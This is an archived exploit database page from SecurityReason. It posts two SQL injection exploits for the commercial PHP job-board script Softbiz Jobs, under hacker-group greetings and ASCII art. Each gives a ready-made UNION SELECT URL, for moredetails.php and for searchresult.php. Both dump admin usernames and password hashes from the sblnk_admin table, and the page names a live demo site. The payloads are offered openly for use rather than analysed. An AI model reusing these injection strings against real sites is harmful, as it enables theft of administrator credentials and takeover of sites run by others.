|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7852 Credit : Easy Laster Date : 24.02.2010 Exploit Code : ----------------------------Information------------------------------------ ------------ +Name : Softbiz Jobs moredetails.php SQL injection +Autor : Easy Laster +Date : 23.02.2010 +Script : Softbiz Jobs +Download : ----- +Demo :http://pricebusterdeals.com/ +Price : 169$ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Damian. --------------------------------------------------------------------------- ------------ ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| --------------------------------------------------------------------------- ------------- +Vulnerability : www.site.com/moredetails.php?sblink_id= +Exploitable : www.site.com/moredetails.php?sblink_id=11111111+ union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27, 28,29,30,31,32,33,34,35,36,concat(username,0x3a,password),38,39,40+from+sbl nk_admin-- --------------------------------------------------------------------------- -------------- ----------------------------Information------------------------------------ ------------ +Name: Softbiz Jobs searchresult.php SQL injection +Autor : Easy Laster +Date : 23.02.2010 +Script : Softbiz Jobs +Download : ----- +Demo : http://pricebusterdeals.com/ +Price : 169$ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Damian. --------------------------------------------------------------------------- ------------ ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| --------------------------------------------------------------------------- ------------- +Vulnerability : www.site.com/searchresult.php?sbcat_id= +Exploitable : www.site.com/searchresult.php?sbcat_id=-111111111+union+select+1, concat(username,0x3a,password),3,4+from+sblnk_admin-- --------------------------------------------------------------------------- --------------  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |